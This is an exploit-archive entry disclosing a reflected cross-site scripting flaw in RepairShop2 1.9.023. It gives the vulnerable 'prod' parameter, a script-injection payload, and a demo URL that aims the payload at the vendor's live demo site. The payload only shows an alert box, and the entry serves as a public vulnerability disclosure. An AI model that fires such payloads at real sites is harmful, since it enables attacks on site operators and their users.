RepairShop2 - Cross Site Scripting (XSS) Vulnerability

2010-03-22T00:00:00
ID 1337DAY-ID-11396
Type zdt
Reporter kaMtiEz
Modified 2010-03-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================
RepairShop2 - Cross Site Scripting (XSS) Vulnerability
======================================================


#############################################################################################################
## RepairShop2 - cross site scripting ( XSS )                                                           ##
## Author : kaMtiEz ([email protected])   ##
## Homepage : http://www.indonesiancoder.com               ##
## Date : 20 March, 2010                                   ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.realitymedias.com/
[+] Download : http://www.realitymedias.com/repairshop/?L=downloads
[+] version : 1.9.023
[+] Vulnerability : XSS
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/shop/?b=products.details&prod=[INDONESIANCODER]

[ EXPLOIT ]

"><script>alert(666)</script>

[ DEMO ]

http://n3x.realitymedias.com/rshop_demo/shop/?b=products.details&prod="><script>alert(666)</script>



#  0day.today [2018-01-02]  #